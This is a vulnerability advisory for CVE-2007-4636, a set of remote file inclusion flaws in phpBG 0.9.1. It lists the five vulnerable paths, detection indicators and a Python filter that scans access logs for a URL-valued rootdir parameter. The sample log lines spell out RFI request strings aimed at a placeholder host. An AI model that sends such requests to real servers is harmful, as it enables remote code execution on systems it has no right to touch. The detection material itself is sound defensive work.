CVE-2007-4636
Published 2007-08-31
Priority: P3 · 57 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 71.06% (99.3th percentile)
Multiple PHP remote file inclusion vulnerabilities in phpBG 0.9.1 allow remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter to (1) intern/admin/other/backup.php, (2) intern/admin/, (3) intern/clan/member_add.php, (4) intern/config/key_2.php, or (5) intern/config/forum.php.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbg | phpbg | — | — |
Detection & IOCs
- Detect HTTP requests targeting phpBG scripts with a user-controlled `rootdir` parameter containing a remote URL (RFI pattern), particularly to the five known vulnerable paths.
- Flag GET requests where the `rootdir` query parameter value begins with `http://` or `https://` against any of the five vulnerable phpBG endpoints.
- The `admin=1` parameter accompanies the RFI payload specifically on the backup.php endpoint; include this in detection logic for that path.
- The PoC uses a placeholder value ('Shell') for the rootdir parameter; in real attacks this would be replaced with a remote URL pointing to attacker-controlled PHP code. Detection rules should match on URL-like values (e.g., http://, https://, ftp://) in the rootdir parameter, not the literal string 'Shell'.
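
The checks listed above, as an added example (not taken from the advisory or any indexed source): a Python filter over web access logs that flags a URL-like `rootdir` value on the five listed paths. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The five endpoints named in the CVE description; the install prefix may vary.
VULNERABLE_SUFFIXES = (
    "intern/admin/other/backup.php",
    "intern/admin/",
    "intern/clan/member_add.php",
    "intern/config/key_2.php",
    "intern/config/forum.php",
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Request line inside a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def check_line(line):
    """Return a finding dict if the line matches the rootdir RFI pattern, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith(VULNERABLE_SUFFIXES):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for value in params.get("rootdir", []):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            return {
                "path": parts.path,
                "rootdir": value,
                # admin=1 accompanies the payload on backup.php (see the list above)
                "admin_flag": params.get("admin") == ["1"],
            }
    return None


def scan(lines):
    return [hit for hit in map(check_line, lines) if hit]

# Constructed sample access-log lines (documentation IPs, example.invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [-] "GET /phpbg/intern/admin/other/backup.php?admin=1&rootdir=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [-] "GET /intern/config/forum.php?rootdir=HTTPS%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 310',
    '192.0.2.12 - - [-] "GET /phpbg/intern/clan/member_add.php?rootdir=Shell HTTP/1.1" 200 128',
    '192.0.2.13 - - [-] "GET /phpbg/index.php?page=news HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Only the query string is inspected, so a `rootdir` value sent in a POST body will not appear in standard access logs and needs request-body logging or a WAF rule instead.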
References
- http://osvdb.org/38429
- http://osvdb.org/38430
- http://osvdb.org/38431
- http://osvdb.org/38432
- http://osvdb.org/38433
- http://www.securityfocus.com/bid/25486
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36348
- https://www.exploit-db.com/exploits/4340